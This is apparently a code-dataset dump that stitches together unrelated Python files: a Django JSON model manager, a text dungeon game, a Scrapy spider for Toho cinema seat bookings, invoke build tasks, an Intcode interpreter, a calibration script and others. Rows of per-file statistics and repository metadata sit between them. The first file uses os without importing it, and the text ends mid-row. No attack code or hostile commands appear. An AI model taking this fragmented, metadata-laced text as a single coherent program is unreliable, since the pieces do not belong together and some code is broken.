import json
import datetime
from easydict import EasyDict as edict
from django.conf import settings
from rando import logger
from rando.core import classproperty
class JSONManager(object):
def __init__(self, klass=object, filepath='', language=None, use_tmp=False):
self.klass = klass
self.filepath = filepath
self.language = language
self.use_tmp = use_tmp
def filter(self, **kwargs):
self.__dict__.update(**kwargs)
return self
@property
def fullpath(self):
self.filepath = self.filepath.format(**self.__dict__)
base_path = settings.INPUT_DATA_ROOT if not self.use_tmp else settings.INPUT_TMP_ROOT
return os.path.join(base_path, self.language or '', self.filepath)
@property
def content(self):
try:
logger.debug("Read content from %s" % self.fullpath)
with open(self.fullpath, 'r') as f:
content = f.read()
return content
except IOError:
logger.error("Could not read '%s'" % self.fullpath)
return '[]'
def all(self):
"""
Instanciate objects on the fly
We use edict() in order to recursively transform dicts into attributes.
(ex.: object['properties']['districts'][0]['pk'] becomes
object.properties.districts[0].pk)
"""
objects = self._read_content()
if isinstance(objects, (list, tuple)):
return [self.klass(objects=self, **edict(o)) for o in objects]
assert isinstance(objects, dict)
return self.klass(objects=self, **edict(objects))
def _read_content(self):
return json.loads(self.content)
class GeoJSONManager(JSONManager):
def _read_content(self):
geojson = super(GeoJSONManager, self)._read_content()
return geojson.get('features', []) if len(geojson) > 0 else []
class JSONModel(object):
filepath = None
manager_class = JSONManager
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
@property
def last_modified(self):
t = os.path.getmtime(self.objects.fullpath)
return datetime.datetime.fromtimestamp(t)
@property
def pk(self):
return self.properties.pk
@classproperty
def objects(cls):
return cls.manager_class(cls, cls.filepath)
@classproperty
def tmp_objects(cls):
return cls.manager_class(cls, cls.filepath, use_tmp=True)
_default_manager = objects
class GeoJSONModel(JSONModel):
manager_class = GeoJSONManager
@property
def geojson(self):
return json.dumps({
"type": "Feature",
"geometry": { "type": self.geometry.type,
"coordinates": self.geometry.coordinates
},
"properties": self.properties,
})
class Settings(JSONModel):
filepath = 'api/settings.json'
| 27.481132
| 93
| 0.632338
| 2,724
| 0.935118
| 0
| 0
| 1,250
| 0.429111
| 0
| 0
| 387
| 0.132853
|
8bd1ed48c83c831815502fd8f24e3c648f5c81ee
| 3,741
|
py
|
Python
|
libs/dungeon.py
|
IdeaBot/explorer
|
2cd02cacb2a37f3da3308e79e88f8c26f4401b8e
|
[
"MIT"
] | null | null | null |
libs/dungeon.py
|
IdeaBot/explorer
|
2cd02cacb2a37f3da3308e79e88f8c26f4401b8e
|
[
"MIT"
] | null | null | null |
libs/dungeon.py
|
IdeaBot/explorer
|
2cd02cacb2a37f3da3308e79e88f8c26f4401b8e
|
[
"MIT"
] | null | null | null |
'''
Dungeon object class
created 2019-03-19 by NGnius '''
# import math
import random
DEFAULT_SIZE = 16
WIDTH = 42
ANIMATION_CHAR = '*'
BLANK_CHAR = '.'
PORTAL_CHAR = '0'
class Dungeon():
def __init__(self, size=DEFAULT_SIZE, level=1):
self.WIDTH = WIDTH
self.size = size
self.level = level
# make board
self._board = self._make_board() # list of list; size^2
self._animated_board = self._make_board()
# 2 randomly placed portals
self.portals = (self.find_random_location(), self.find_random_location())
def animate(self, fr, to, _char=ANIMATION_CHAR):
vector = (to[0]-fr[0], to[1]-fr[1])
n = (vector[0]**2 + vector[1]**2)**(0.5)
uvector = (vector[0]/n, vector[1]/n)
# print(uvector, 'is your vector, Victor')
for i in range(1, max(abs(vector[0]), abs(vector[1]))):
self._animated_board[fr[0]+round(i*uvector[0])][fr[1]+round(i*uvector[1])] = _char
self._animated_board[to[0]][to[1]] = _char # just in case it's missed by vector drawing
def move_place(self, obj, coords):
if self._verify_coords(coords):
self._board[coords[0]][coords[1]] = obj
def move_swap(self, coords1, coords2):
if self._verify_coords(coords1) and self._verify_coords(coords2):
self._board[coords1[0]][coords1[1]], self._board[coords2[0]][coords2[1]] = self._board[coords2[0]][coords2[1]], self._board[coords1[0]][coords1[1]]
def _make_board(self, fill=None):
board = list()
for x in range(WIDTH):
board.append(list())
for y in range(self.size):
board[x].append(fill)
return board
def draw_board(self, blank=BLANK_CHAR):
board_str = ''
for y in range(self.size):
row_str = ''
for x in range(WIDTH):
if self._animated_board[x][y] is not None:
row_str += self._animated_board[x][y]
self._animated_board[x][y] = None # reset animations as we go
elif (x,y) in self.portals:
row_str += PORTAL_CHAR
elif self._board[x][y] is not None:
row_str += self._board[x][y].char
else:
row_str += blank
board_str = '\n' + row_str + board_str
return board_str
def do_turn(self):
done_turn = list()
# do move or attack for people on board
for x in range(WIDTH):
for y in range(self.size):
person = self._board[x][y]
if person is not None and person.name not in done_turn:
# print('Move/Attacking', person.name)
person.move_or_attack()
done_turn.append(person.name)
def get_person(self, coords):
if coords[0] >= WIDTH or coords[1] >= self.size:
return
return self._board[coords[0]][coords[1]]
def find_person(self, name):
for x in range(WIDTH):
for y in range(self.size):
person = self._board[x][y]
if person is not None:
if person.name == name:
return (x,y)
def find_random_location(self):
person_at = not None # legit
while person_at is not None:
coords = (random.randrange(0, self.size), random.randrange(0, self.size))
person_at = self.get_person(coords)
return coords
def _verify_coords(self, coords):
if coords[0] >= WIDTH or coords[0] < 0:
return False
if coords[1] >= self.size or coords[1] < 0:
return False
return True
| 35.971154
| 159
| 0.555199
| 3,566
| 0.953221
| 0
| 0
| 0
| 0
| 0
| 0
| 346
| 0.092489
|
8bd259e0e2d2b9af5c910c05de23636129ffb891
| 113
|
py
|
Python
|
01_Language/01_Functions/python/fflush.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 3
|
2020-06-28T07:42:51.000Z
|
2021-01-15T10:32:11.000Z
|
01_Language/01_Functions/python/fflush.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 9
|
2021-03-10T22:45:40.000Z
|
2022-02-27T06:53:20.000Z
|
01_Language/01_Functions/python/fflush.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 1
|
2021-01-15T10:51:24.000Z
|
2021-01-15T10:51:24.000Z
|
# coding: utf-8
f = open("test.txt", mode="r+")
f.write("hello world")
f.flush()
f.truncate(f.tell())
f.close()
| 14.125
| 31
| 0.610619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 42
| 0.371681
|
8bd2af77c54189a911eb6a57a33e86e0c8005dbd
| 10,917
|
py
|
Python
|
scrapyproject/showingspiders/toho_v2.py
|
gas1121/JapanCinemaStatusSpider
|
67c7b963914565589f64dd1bcf18839a4160ea34
|
[
"MIT"
] | 2
|
2018-06-07T13:28:03.000Z
|
2018-12-10T14:04:53.000Z
|
scrapyproject/showingspiders/toho_v2.py
|
gas1121/JapanCinemaStatusSpider
|
67c7b963914565589f64dd1bcf18839a4160ea34
|
[
"MIT"
] | null | null | null |
scrapyproject/showingspiders/toho_v2.py
|
gas1121/JapanCinemaStatusSpider
|
67c7b963914565589f64dd1bcf18839a4160ea34
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import unicodedata
import json
import arrow
import scrapy
from scrapyproject.showingspiders.showing_spider import ShowingSpider
from scrapyproject.items import (ShowingLoader, init_show_booking_loader)
from scrapyproject.utils import TohoUtil
class TohoV2Spider(ShowingSpider):
"""
Toho site spider version 2.
Improve crawling speed as we grab data from json api instead of site page.
useful json api:
theater list:
https://hlo.tohotheater.jp/responsive/json/theater_list.json?_dc=1488106193
movies showing now:
https://hlo.tohotheater.jp/data_net/json/movie/TNPI3090.JSON
movies coming soon:
https://hlo.tohotheater.jp/data_net/json/movie/TNPI3080.JSON
time schedule table:
https://hlo.tohotheater.jp/net/schedule/TNPI3070J02.do?
__type__=json&movie_cd=014174&vg_cd=028&term=99&seq_disp_term=7
&site_cd=&enter_kbn=&_dc=1488106557
detail schedule table for movie:
https://hlo.tohotheater.jp/net/schedule/TNPI3070J01.do?
__type__=json&movie_cd=014174&vg_cd=028&show_day=20170226
&term=99&isMember=&site_cd=028&enter_kbn=&_dc=1488106558
cinema schedult table:
https://hlo.tohotheater.jp/net/schedule/TNPI3050J02.do?
__type__=html&__useResultInfo__=no&vg_cd=076&show_day=20170226
&term=99&isMember=&enter_kbn=&_dc=1488120297
Visit page example:
https://www.tohotheater.jp/theater/find.html
https://hlo.tohotheater.jp/net/movie/TNPI3090J01.do
https://hlo.tohotheater.jp/net/movie/TNPI3060J01.do?sakuhin_cd=014174
https://hlo.tohotheater.jp/net/ticket/034/TNPI2040J03.do
We will first crawl cinema list, then crawl each cinema's schedule data,
and generate booking page urls to crawl exact booking number
"""
name = "toho_v2"
allowed_domains = ["hlo.tohotheater.jp", "www.tohotheater.jp"]
start_urls = [
'https://hlo.tohotheater.jp/responsive/json/theater_list.json'
]
def parse(self, response):
"""
crawl theater list data first
"""
try:
theater_list = json.loads(response.text)
except json.JSONDecodeError:
return
if (not theater_list):
return
for curr_cinema in theater_list:
cinema_name_list = self.get_cinema_name_list(curr_cinema)
if not self.is_cinema_crawl(cinema_name_list):
continue
site_cd = curr_cinema['VIT_GROUP_CD']
show_day = self.date
curr_cinema_url = self.generate_cinema_schedule_url(
site_cd, show_day)
request = scrapy.Request(curr_cinema_url,
callback=self.parse_cinema)
yield request
def get_cinema_name_list(self, curr_cinema):
# replace full width text before compare
vit_group_nm = unicodedata.normalize('NFKC',
curr_cinema['VIT_GROUP_NM'])
theater_name = unicodedata.normalize('NFKC',
curr_cinema['THEATER_NAME'])
theater_name_english = unicodedata.normalize(
'NFKC', curr_cinema['THEATER_NAME_ENGLISH'])
site_name = unicodedata.normalize('NFKC', curr_cinema['SITE_NM'])
return [vit_group_nm, theater_name, theater_name_english, site_name]
def generate_cinema_schedule_url(self, site_cd, show_day):
"""
json data url for single cinema, all movies of curr cinema
"""
url = 'https://hlo.tohotheater.jp/net/schedule/TNPI3050J02.do?'\
'__type__=html&__useResultInfo__=no'\
'&vg_cd={site_cd}&show_day={show_day}&term=99'.format(
site_cd=site_cd, show_day=show_day)
return url
def parse_cinema(self, response):
# some cinemas may not open and will return empty response
try:
schedule_data = json.loads(response.text)
except json.JSONDecodeError:
return
if (not schedule_data):
return
result_list = []
for curr_cinema in schedule_data:
showing_url_parameter = {}
date_str = curr_cinema['showDay']['date']
showing_url_parameter['show_day'] = arrow.get(
date_str, 'YYYYMMDD').replace(tzinfo='UTC+9')
for sub_cinema in curr_cinema['list']:
self.parse_sub_cinema(
response, sub_cinema, showing_url_parameter, result_list)
for result in result_list:
if result:
yield result
def parse_sub_cinema(self, response, sub_cinema,
showing_url_parameter, result_list):
site_cd = sub_cinema['code']
showing_url_parameter['site_cd'] = site_cd
data_proto = ShowingLoader(response=response)
data_proto.add_cinema_name(sub_cinema['name'])
cinema_site = TohoUtil.generate_cinema_homepage_url(site_cd)
data_proto.add_cinema_site(cinema_site, sub_cinema['name'])
data_proto.add_value('source', self.name)
for curr_movie in sub_cinema['list']:
self.parse_movie(response, curr_movie, showing_url_parameter,
data_proto, result_list)
def parse_movie(self, response, curr_movie,
showing_url_parameter, data_proto, result_list):
"""
parse movie showing data
movie may have different versions
"""
movie_data_proto = ShowingLoader(response=response)
movie_data_proto.add_value(None, data_proto.load_item())
movie_data_proto.add_title(
title=curr_movie['name'], title_en=curr_movie['ename'])
title_list = movie_data_proto.get_title_list()
if not self.is_movie_crawl(title_list):
return
showing_url_parameter['movie_cd'] = curr_movie['code']
for curr_screen in curr_movie['list']:
self.parse_screen(response, curr_screen, showing_url_parameter,
movie_data_proto, result_list)
def parse_screen(self, response, curr_screen,
showing_url_parameter, data_proto, result_list):
showing_url_parameter['theater_cd'] = curr_screen['theaterCd']
showing_url_parameter['screen_cd'] = curr_screen['code']
screen_data_proto = ShowingLoader(response=response)
screen_data_proto.add_value(None, data_proto.load_item())
screen_data_proto.add_screen_name(curr_screen['ename'])
for curr_showing in curr_screen['list']:
# filter empty showing
if not curr_showing['unsoldSeatInfo']:
continue
self.parse_showing(response, curr_showing, showing_url_parameter,
screen_data_proto, result_list)
def parse_showing(self, response, curr_showing,
showing_url_parameter, data_proto, result_list):
def parse_time(time_str):
"""
ex. "24:40"
"""
time = time_str.split(":")
return (int(time[0]), int(time[1]))
showing_url_parameter['showing_cd'] = curr_showing['code']
showing_data_proto = ShowingLoader(response=response)
showing_data_proto.add_value(None, data_proto.load_item())
# time like 24:40 can not be directly parsed,
# so we need to shift time properly
start_hour, start_minute = parse_time(curr_showing['showingStart'])
showing_data_proto.add_value('start_time', self.get_time_from_text(
start_hour, start_minute))
end_hour, end_minute = parse_time(curr_showing['showingEnd'])
showing_data_proto.add_value('end_time', self.get_time_from_text(
end_hour, end_minute))
showing_data_proto.add_value('seat_type', 'NormalSeat')
# query screen number from database
showing_data_proto.add_total_seat_count()
# check whether need to continue crawl booking data or stop now
if not self.crawl_booking_data:
result_list.append(showing_data_proto.load_item())
return
booking_data_proto = init_show_booking_loader(response=response)
booking_data_proto.add_value('showing', showing_data_proto.load_item())
book_status = curr_showing['unsoldSeatInfo']['unsoldSeatStatus']
booking_data_proto.add_book_status(book_status, util=TohoUtil)
book_status = booking_data_proto.get_output_value('book_status')
if book_status in ['SoldOut', 'NotSold']:
# sold out or not sold
total_seat_count = showing_data_proto.get_output_value(
'total_seat_count')
book_seat_count = (
total_seat_count if book_status == 'SoldOut' else 0)
booking_data_proto.add_value('book_seat_count', book_seat_count)
booking_data_proto.add_time_data()
result_list.append(booking_data_proto.load_item())
return
else:
# normal, need to crawl book number on order page
url = self.generate_showing_url(**showing_url_parameter)
request = scrapy.Request(url,
callback=self.parse_normal_showing)
request.meta["data_proto"] = booking_data_proto.load_item()
result_list.append(request)
def generate_showing_url(self, site_cd, show_day, theater_cd, screen_cd,
movie_cd, showing_cd):
"""
generate showing url from given data
:param show_day: arrow object
"""
# example: javascript:ScheduleUtils.purchaseTicket(
# "20170212", "076", "013132", "0761", "11", "2")
# example: https://hlo.tohotheater.jp/net/ticket/076/TNPI2040J03.do
# ?site_cd=076&jyoei_date=20170209&gekijyo_cd=0761&screen_cd=10
# &sakuhin_cd=014183&pf_no=5&fnc=1&pageid=2000J01&enter_kbn=
day_str = show_day.format('YYYYMMDD')
return "https://hlo.tohotheater.jp/net/ticket/{site_cd}/"\
"TNPI2040J03.do?site_cd={site_cd}&jyoei_date={jyoei_date}"\
"&gekijyo_cd={gekijyo_cd}&screen_cd={screen_cd}"\
"&sakuhin_cd={sakuhin_cd}&pf_no={pf_no}&fnc={fnc}"\
"&pageid={pageid}&enter_kbn={enter_kbn}".format(
site_cd=site_cd, jyoei_date=day_str,
gekijyo_cd=theater_cd, screen_cd=screen_cd,
sakuhin_cd=movie_cd, pf_no=showing_cd,
fnc="1", pageid="2000J01", enter_kbn="")
def parse_normal_showing(self, response):
booked_seat_count = len(response.css('[alt~="購入済(選択不可)"]'))
result = init_show_booking_loader(
response=response, item=response.meta["data_proto"])
result.add_value('book_seat_count', booked_seat_count)
result.add_time_data()
yield result.load_item()
| 45.298755
| 79
| 0.646973
| 10,661
| 0.9753
| 1,951
| 0.178483
| 0
| 0
| 0
| 0
| 3,590
| 0.328424
|
8bd49f53da7caa09d61a988bf0e05ae48ef80b17
| 947
|
py
|
Python
|
tasks.py
|
ggrbill/fortran-examples
|
a790462fa3956a65505d4f529556f81cd5b0de95
|
[
"MIT"
] | null | null | null |
tasks.py
|
ggrbill/fortran-examples
|
a790462fa3956a65505d4f529556f81cd5b0de95
|
[
"MIT"
] | null | null | null |
tasks.py
|
ggrbill/fortran-examples
|
a790462fa3956a65505d4f529556f81cd5b0de95
|
[
"MIT"
] | null | null | null |
from invoke import task
@task()
def clean(ctx):
"""
Delete 'build' folder.
"""
print("Cleaning!")
ctx.run("rm -Rf build")
@task(
help = {
'cclean': "Call Clean task (Delete 'build' folder) before build again."
}
)
def build(ctx, cclean=False):
"""
Build Fortran95 code.
"""
if cclean:
clean(ctx)
print("Building!")
commands = [
'mkdir build',
'cd build',
'f95 -c ../src/vector_math.f95 ../src/hello.f95',
'f95 hello.o vector_math.o -o hello',
]
ctx.run(' && '.join(commands))
@task(
help = {
'cclean': "Call Clean task (Delete 'build' folder) before build again."
}
)
def build_fc(ctx, cclean=False):
"""
Build C code that calls a Fortran95 module.
"""
if cclean:
clean(ctx)
print("Building!")
commands = [
'mkdir build',
'cd build',
'gcc -c ../src/callfortran.c',
'f95 callfortran.o ../src/modulefort.f95',
]
ctx.run(' && '.join(commands))
| 18.211538
| 74
| 0.583949
| 0
| 0
| 0
| 0
| 909
| 0.959873
| 0
| 0
| 519
| 0.548046
|
8bd4b1d2130b763d822163e0d5fcb7c191a3f224
| 203
|
py
|
Python
|
aristotle_json_editor/apps.py
|
aristotle-mdr/json-metadata-editor
|
2d97bea85c822d2e7b59fc8d96ca3eaa3b1ed916
|
[
"MIT"
] | null | null | null |
aristotle_json_editor/apps.py
|
aristotle-mdr/json-metadata-editor
|
2d97bea85c822d2e7b59fc8d96ca3eaa3b1ed916
|
[
"MIT"
] | 1
|
2017-07-25T09:44:11.000Z
|
2017-07-25T09:44:11.000Z
|
aristotle_json_editor/apps.py
|
aristotle-mdr/json-metadata-editor
|
2d97bea85c822d2e7b59fc8d96ca3eaa3b1ed916
|
[
"MIT"
] | null | null | null |
from aristotle_mdr.apps import AristotleExtensionBaseConfig
class AristotleJSONEditorConfig(AristotleExtensionBaseConfig):
name = 'aristotle_json_editor'
verbose_name = "Aristotle JSON Editor"
| 29
| 62
| 0.832512
| 140
| 0.689655
| 0
| 0
| 0
| 0
| 0
| 0
| 46
| 0.226601
|
8bd58dcecb3710fe85f09d22baab6422be4f4f1c
| 323
|
py
|
Python
|
fairlearn/reductions/_exponentiated_gradient/__init__.py
|
arita37/fairlearn
|
8f2cb25ca6a0c0aadcff90b927936de6d53ff5fa
|
[
"MIT"
] | 2
|
2019-11-30T09:02:42.000Z
|
2019-12-02T10:24:29.000Z
|
fairlearn/reductions/_exponentiated_gradient/__init__.py
|
arita37/fairlearn
|
8f2cb25ca6a0c0aadcff90b927936de6d53ff5fa
|
[
"MIT"
] | null | null | null |
fairlearn/reductions/_exponentiated_gradient/__init__.py
|
arita37/fairlearn
|
8f2cb25ca6a0c0aadcff90b927936de6d53ff5fa
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from .exponentiated_gradient import ExponentiatedGradient # noqa: F401
from .exponentiated_gradient import ExponentiatedGradientResult # noqa: F401
__all__ = [
"ExponentiatedGradient",
"ExponentiatedGradientResult"
]
| 29.363636
| 77
| 0.79257
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 168
| 0.520124
|
8bd6939b53a3043718695a488bbde929cd4e44d7
| 423
|
py
|
Python
|
akagi/contents/__init__.py
|
pauchan/akagi
|
7cf1f5a52b8f1ebfdc74a527bf6b26254f99343b
|
[
"MIT"
] | 26
|
2017-05-18T11:52:04.000Z
|
2018-08-25T22:03:07.000Z
|
akagi/contents/__init__.py
|
pauchan/akagi
|
7cf1f5a52b8f1ebfdc74a527bf6b26254f99343b
|
[
"MIT"
] | 325
|
2017-05-08T07:22:28.000Z
|
2022-03-31T15:43:18.000Z
|
akagi/contents/__init__.py
|
pauchan/akagi
|
7cf1f5a52b8f1ebfdc74a527bf6b26254f99343b
|
[
"MIT"
] | 7
|
2017-05-02T02:06:15.000Z
|
2020-04-09T05:32:11.000Z
|
# -*- coding: utf-8 -*-
from akagi.contents import s3_content
from akagi.contents import local_file_content
from akagi.contents import spreadsheet_content
from akagi.contents import url_content
from akagi.contents.s3_content import S3Content
from akagi.contents.local_file_content import LocalFileContent
from akagi.contents.spreadsheet_content import SpreadsheetContent
from akagi.contents.url_content import URLContent
| 35.25
| 65
| 0.858156
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.054374
|
8bd769344a472b553f48b5163b0040a5e6c76aa3
| 4,313
|
py
|
Python
|
src/advent/year2019/intcode.py
|
davidism/advent
|
761756f179c3547f44ec035880f29f58d80903f8
|
[
"BSD-3-Clause"
] | 5
|
2019-12-09T06:02:22.000Z
|
2021-12-03T18:02:49.000Z
|
src/advent/year2019/intcode.py
|
davidism/advent
|
761756f179c3547f44ec035880f29f58d80903f8
|
[
"BSD-3-Clause"
] | null | null | null |
src/advent/year2019/intcode.py
|
davidism/advent
|
761756f179c3547f44ec035880f29f58d80903f8
|
[
"BSD-3-Clause"
] | 2
|
2019-09-19T04:44:33.000Z
|
2021-05-09T14:39:58.000Z
|
from collections import defaultdict
from collections import deque
from typing import Deque
from typing import Dict
from typing import Iterable
from typing import List
from advent.load import read_input
def op(code: int, size: int, write=False):
def wrapper(f):
f.op = code
f.size = size
f.write = size - 1 if write else -1
return f
return wrapper
def find_ops(cls):
for key, value in vars(cls).items():
if key.startswith("op_"):
cls._op_to_name[value.op] = key
return cls
@find_ops
class Interpreter:
_op_to_name: Dict[int, str] = {}
def __init__(self, data: List[int], input=None, output=None):
self.data = defaultdict(int, enumerate(data))
self.pos = 0
self.ops = {k: getattr(self, v) for k, v in self._op_to_name.items()}
self.input = prepare_io(input)
self.output = prepare_io(output, output=True)
self.halted = False
self.rel = 0
def __getitem__(self, item: int) -> int:
return self.data[item]
def __setitem__(self, item: int, value: int):
self.data[item] = value
def run(self):
if self.halted:
return False
while True:
modes, op = divmod(self.data[self.pos], 100)
self.pos += 1
op = self.ops[op]
args = [self.data[self.pos + i] for i in range(op.size)]
self.pos += op.size
for i, arg in enumerate(args):
modes, mode = divmod(modes, 10)
if mode == 0:
if i != op.write:
args[i] = self.data[arg]
if mode == 2:
if i == op.write:
args[i] = self.rel + arg
else:
args[i] = self.data[self.rel + arg]
try:
op(*args)
except HaltExecution:
self.halted = True
break
except WaitInput:
self.pos -= 1 + op.size
break
return True
@op(99, 0)
def op_halt(self):
raise HaltExecution
@op(1, 3, True)
def op_add(self, a, b, dest):
self.data[dest] = a + b
@op(2, 3, True)
def op_mul(self, a, b, dest):
self.data[dest] = a * b
@op(3, 1, True)
def op_read(self, dest):
try:
value = self.input.popleft()
except IndexError:
raise WaitInput from None
self.data[dest] = value
@op(4, 1)
def op_write(self, value):
self.output.append(value)
@op(5, 2)
def op_jnz(self, test, goto):
if test:
self.pos = goto
@op(6, 2)
def op_jz(self, test, goto):
if not test:
self.pos = goto
@op(7, 3, True)
def op_lt(self, a, b, dest):
self.data[dest] = int(a < b)
@op(8, 3, True)
def op_eq(self, a, b, dest):
self.data[dest] = int(a == b)
@op(9, 1)
def op_rel(self, delta):
self.rel += delta
class InterpreterGroup:
def __init__(self):
self.group: List[Interpreter] = []
@property
def output(self) -> deque:
return self.group[-1].output
def attach(self, interpreter: Interpreter):
if not self.group:
self.group.append(interpreter)
else:
self.output.extendleft(reversed(interpreter.input))
interpreter.input = self.output
self.group.append(interpreter)
def feedback(self):
self.output.extend(self.group[0].input)
self.group[0].input = self.output
def run(self):
while True:
for interpreter in self.group:
interpreter.run()
if any(interpreter.halted for interpreter in self.group):
break
def prepare_io(value: Iterable[int] = None, output=False) -> Deque[int]:
if value is None:
return deque()
if not (
hasattr(value, "append" if output else "popleft") or isinstance(value, deque)
):
return deque(value)
return value
class HaltExecution(Exception):
pass
class WaitInput(Exception):
pass
def read_intcode(name=None) -> List[int]:
return [int(x) for x in read_input(name, 2).split(",")]
| 23.828729
| 85
| 0.537909
| 3,367
| 0.780663
| 0
| 0
| 2,596
| 0.601901
| 0
| 0
| 25
| 0.005796
|
8bd88ec45c6933abd1b51585d3a13a40674a382b
| 225
|
py
|
Python
|
exer/ex5-2.py
|
vitorsergiota/python
|
2cc95392a2a52a871e0582e4e900c0aa24a021a1
|
[
"MIT"
] | null | null | null |
exer/ex5-2.py
|
vitorsergiota/python
|
2cc95392a2a52a871e0582e4e900c0aa24a021a1
|
[
"MIT"
] | null | null | null |
exer/ex5-2.py
|
vitorsergiota/python
|
2cc95392a2a52a871e0582e4e900c0aa24a021a1
|
[
"MIT"
] | null | null | null |
num = int(input('Escreva um digito:'))
soma=0
while num > 0
digito = num%10 # obtem algarismo unidades
num = num // 10 # remove algarismo unidades
if digito % 2 == 0: #par
soma = soma + digito
print(soma)
| 25
| 47
| 0.622222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 77
| 0.342222
|
8bd89aabbee1878012e7f1e4e9d5683197eea5ee
| 342
|
py
|
Python
|
korzh_bot/uleague/exceptions.py
|
uleague/universityleague-steam
|
65539664c0c6aad94a7ff3a3208323a554e1fddd
|
[
"MIT"
] | null | null | null |
korzh_bot/uleague/exceptions.py
|
uleague/universityleague-steam
|
65539664c0c6aad94a7ff3a3208323a554e1fddd
|
[
"MIT"
] | 2
|
2020-09-14T21:55:03.000Z
|
2020-11-17T17:23:34.000Z
|
korzh_bot/uleague/exceptions.py
|
uleague/universityleague-steam
|
65539664c0c6aad94a7ff3a3208323a554e1fddd
|
[
"MIT"
] | null | null | null |
class ULeagueRequestError(Exception):
"""
Basic exception for all requests
"""
def __init__(self, message):
self.message = message
super().__init__(self.message)
def __str__(self):
return "Произошла ошибка во время выполнения запроса на ULeague --> {}".format(
self.message
)
| 24.428571
| 87
| 0.614035
| 382
| 0.997389
| 0
| 0
| 0
| 0
| 0
| 0
| 153
| 0.399478
|
8bd97144b2dc03785cd1d725114cfe7c4ea6a97a
| 644
|
py
|
Python
|
story/models.py
|
sachink2010/DjangoTrial
|
8b78a31409b614959ed45380f2b8ee9f03fa9f90
|
[
"MIT"
] | null | null | null |
story/models.py
|
sachink2010/DjangoTrial
|
8b78a31409b614959ed45380f2b8ee9f03fa9f90
|
[
"MIT"
] | null | null | null |
story/models.py
|
sachink2010/DjangoTrial
|
8b78a31409b614959ed45380f2b8ee9f03fa9f90
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Story(models.Model):
user_input = models.CharField(max_length=600)
api_response = models.CharField(max_length=2000, null=True, blank=True)
#timestamp=models.DateTimeField
created_at = models.DateTimeField(auto_now_add=True)
username = models.CharField(max_length=200)
class Code(models.Model):
user_input = models.CharField(max_length=600)
api_response = models.CharField(max_length=2000, null=True, blank=True)
#timestamp=models.DateTimeField
created_at = models.DateTimeField(auto_now_add=True)
username = models.CharField(max_length=200)
| 40.25
| 75
| 0.768634
| 585
| 0.908385
| 0
| 0
| 0
| 0
| 0
| 0
| 88
| 0.136646
|
8bdc456df221aa9aaf1072900c707aafc646d202
| 3,123
|
py
|
Python
|
scripts/find_best_fit.py
|
NERC-CEH/nanofase-calibration
|
e45da5f0566e345504214018eb4b9c013bab4c57
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/find_best_fit.py
|
NERC-CEH/nanofase-calibration
|
e45da5f0566e345504214018eb4b9c013bab4c57
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/find_best_fit.py
|
NERC-CEH/nanofase-calibration
|
e45da5f0566e345504214018eb4b9c013bab4c57
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
import os
import sys
import argparse
import re
import shutil
import numpy as np
from netCDF4 import Dataset
"""This script is useful for finding the best find from the `optimize.log` file,
the getting the parameters for this fit from logged results"""
# Parse the input arguments
parser = argparse.ArgumentParser(description='Find the best parameters so find')
parser.add_argument('--caldir', '-c', help='path to the calibration directory', default='./')
parser.add_argument('--yearrange', '-yr', nargs=2, type=int, help='year range to run calibration for (inclusive)')
parser.set_defaults(yearrange=[2009,2012])
args = parser.parse_args()
cal_dir = args.caldir
year_range = range(args.yearrange[0], args.yearrange[1]+1)
# Open the optimize.log file and find the best fit by plucking the cost and run ID
# from each line that begins with 'C' (Cost for...)
with open(os.path.join(cal_dir, 'optimize.log')) as f:
costs = []
ids = []
for line in f:
if line[0] == 'C':
split = re.split('Cost for |\: ', line)
ids.append(split[1])
costs.append(float(split[2]))
# Print the minimum cost and the corresponding run ID
costs = np.array(costs)
run_id = ids[costs.argmin()]
print(f'Minimum cost: {costs.min()}')
print(f'For run ID: {run_id}')
# Now get the parameters that produced that cost
params_f = np.load(os.path.join(cal_dir, 'results', f'{run_id}.npz'))
params = params_f['params']
# Finally, we can recreate the NetCDF files used for this run
param_names = ['resuspension_alpha', 'resuspension_beta', 'sediment_transport_a', 'sediment_transport_c',
'deposition_alpha', 'deposition_beta', 'bank_erosion_alpha', 'bank_erosion_beta']
# Get the template for the 2D array
nc_subcatchment = Dataset(os.path.join(cal_dir, 'data', f'{args.yearrange[0]}_no-emissions.nc'), 'r')
var = nc_subcatchment['flow_dir'][:,:]
catchment_mask = var.mask
catchment_shape = var.shape
n_cells = var.count()
# Make a copy of the template NetCDFs to add this iteration's params to
for year in year_range:
dst_path = os.path.join(cal_dir, f'data_cache/{year}_no-emissions_{run_id}.nc')
shutil.copy(os.path.join(cal_dir, f'data/{year}_no-emissions.nc'), dst_path)
# Pull out the 1D arrays for each parameter from the params variable, then
# reshape to the correct grid shape and mask and add to NetCDF file
for i, param in enumerate(param_names):
param_1d = params[n_cells*i:n_cells*i+n_cells]
param_2d = np.ma.masked_array(np.empty(catchment_shape), mask=catchment_mask)
# Reshape into 2D arrays, taking into account the mask
j = 0
for i, _ in np.ndenumerate(param_2d):
if ~catchment_mask[i]:
param_2d[i] = param_1d[j]
j = j + 1
# Now add this variable to the NetCDF file, placing a copy in the cache
for year in year_range:
# Then create the new variables
nc = Dataset(os.path.join(cal_dir, f'data_cache/{year}_no-emissions_{run_id}.nc'), 'r+')
var = nc.createVariable(param, datatype=float, dimensions=('y','x'))
var[:] = param_2d
nc.close()
| 42.780822
| 114
| 0.700288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,503
| 0.481268
|
8bde4876eb8d22e2a2bf6ea4f21056c49d4893b8
| 347
|
py
|
Python
|
examples/simple1.py
|
jimcortez/spotipy_twisted
|
